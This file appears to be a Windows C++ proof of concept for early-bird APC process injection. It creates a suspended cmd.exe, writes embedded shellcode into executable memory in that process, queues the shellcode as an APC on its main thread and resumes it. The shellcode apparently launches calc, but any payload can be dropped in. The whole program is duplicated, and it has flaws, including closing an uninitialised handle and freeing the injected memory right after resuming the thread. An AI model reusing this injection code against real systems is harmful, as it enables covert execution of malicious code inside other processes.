Agahlot/QueueUserAPC.cpp

## QueueUserAPC.cpp
#include <windows.h>
#include <stdio.h>
#include <TlHelp32.h>


int main(int argc, char **argv)
{
	char *shellcode =
	"\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
        "\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
        "\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
        "\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
        "\x57\x78\x01\xc2\x8b\x7a\x20\x01"
        "\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
        "\x45\x81\x3e\x43\x72\x65\x61\x75"
        "\xf2\x81\x7e\x08\x6f\x63\x65\x73"
        "\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
        "\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
        "\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
        "\xb1\xff\x53\xe2\xfd\x68\x63\x61"
        "\x6c\x63\x89\xe2\x52\x52\x53\x53"
        "\x53\x53\x53\x53\x52\x53\xff\xd7";

	HANDLE hThread;
	HANDLE hProcess;
	PROCESS_INFORMATION processInfo;
	STARTUPINFOA info;
	ZeroMemory(&info, sizeof(info));
	ZeroMemory(&processInfo, sizeof(processInfo));
	DWORD oldProtect;

        char pPath[] = "C:\\Windows\\System32\\cmd.exe";
	CreateProcessA(pPath, NULL, NULL, NULL, TRUE, CREATE_SUSPENDED, NULL, NULL, &info, &processInfo);

	printf("@g3troot - Length : %d bytes\n", strlen(shellcode));
	printf("Allocating Remote Memory For Shellcode\n");
	LPVOID resultPtr = VirtualAllocEx(processInfo.hProcess, NULL, strlen(shellcode) + 1, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	printf("Shellcode Address: 0x%X\n", (unsigned int)resultPtr);

	printf("Write Shellcode To Remote Process\n");
	WriteProcessMemory(processInfo.hProcess, resultPtr, shellcode, strlen(shellcode) + 1, NULL);

	int targetProc = processInfo.dwProcessId;
	printf("PID: cmd.exe - %d\n", targetProc);

	hThread = OpenThread(THREAD_ALL_ACCESS, FALSE, processInfo.dwThreadId);

	QueueUserAPC((PAPCFUNC)resultPtr, hThread, NULL);

	ResumeThread(hThread);

	CloseHandle(hProcess);
	CloseHandle(hThread);
	VirtualFreeEx(processInfo.hProcess, resultPtr, strlen(shellcode), MEM_RELEASE);

        return EXIT_SUCCESS;
}
	#include <windows.h>
	#include <stdio.h>
	#include <TlHelp32.h>


	int main(int argc, char **argv)
	{
	char *shellcode =
	"\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
	"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
	"\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
	"\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
	"\x57\x78\x01\xc2\x8b\x7a\x20\x01"
	"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
	"\x45\x81\x3e\x43\x72\x65\x61\x75"
	"\xf2\x81\x7e\x08\x6f\x63\x65\x73"
	"\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
	"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
	"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
	"\xb1\xff\x53\xe2\xfd\x68\x63\x61"
	"\x6c\x63\x89\xe2\x52\x52\x53\x53"
	"\x53\x53\x53\x53\x52\x53\xff\xd7";

	HANDLE hThread;
	HANDLE hProcess;
	PROCESS_INFORMATION processInfo;
	STARTUPINFOA info;
	ZeroMemory(&info, sizeof(info));
	ZeroMemory(&processInfo, sizeof(processInfo));
	DWORD oldProtect;

	char pPath[] = "C:\\Windows\\System32\\cmd.exe";
	CreateProcessA(pPath, NULL, NULL, NULL, TRUE, CREATE_SUSPENDED, NULL, NULL, &info, &processInfo);

	printf("@g3troot - Length : %d bytes\n", strlen(shellcode));
	printf("Allocating Remote Memory For Shellcode\n");
	LPVOID resultPtr = VirtualAllocEx(processInfo.hProcess, NULL, strlen(shellcode) + 1, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	printf("Shellcode Address: 0x%X\n", (unsigned int)resultPtr);

	printf("Write Shellcode To Remote Process\n");
	WriteProcessMemory(processInfo.hProcess, resultPtr, shellcode, strlen(shellcode) + 1, NULL);

	int targetProc = processInfo.dwProcessId;
	printf("PID: cmd.exe - %d\n", targetProc);

	hThread = OpenThread(THREAD_ALL_ACCESS, FALSE, processInfo.dwThreadId);

	QueueUserAPC((PAPCFUNC)resultPtr, hThread, NULL);

	ResumeThread(hThread);

	CloseHandle(hProcess);
	CloseHandle(hThread);
	VirtualFreeEx(processInfo.hProcess, resultPtr, strlen(shellcode), MEM_RELEASE);

	return EXIT_SUCCESS;
	}